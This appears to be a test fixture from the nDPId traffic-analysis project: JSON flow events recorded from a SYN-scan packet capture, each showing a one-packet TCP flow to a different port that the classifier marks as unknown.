-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":945,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1046,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":945,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1010,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1046,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1010,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1047,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1047,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059031,"flow_last_seen":1278275059031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1048,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059031,"flow_last_seen":1278275059031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1048,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1047,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1047,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1932,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1049,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1932,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1048,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1048,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1990,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1049,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1990,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1050,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1050,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":891,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1051,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":891,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1051,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":60443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":60443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":964,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1051,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":964,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1051,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1052,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1052,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":60443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":60443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1052,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1052,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1053,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1053,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1054,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1053,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1053,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1054,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1055,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1055,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1056,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 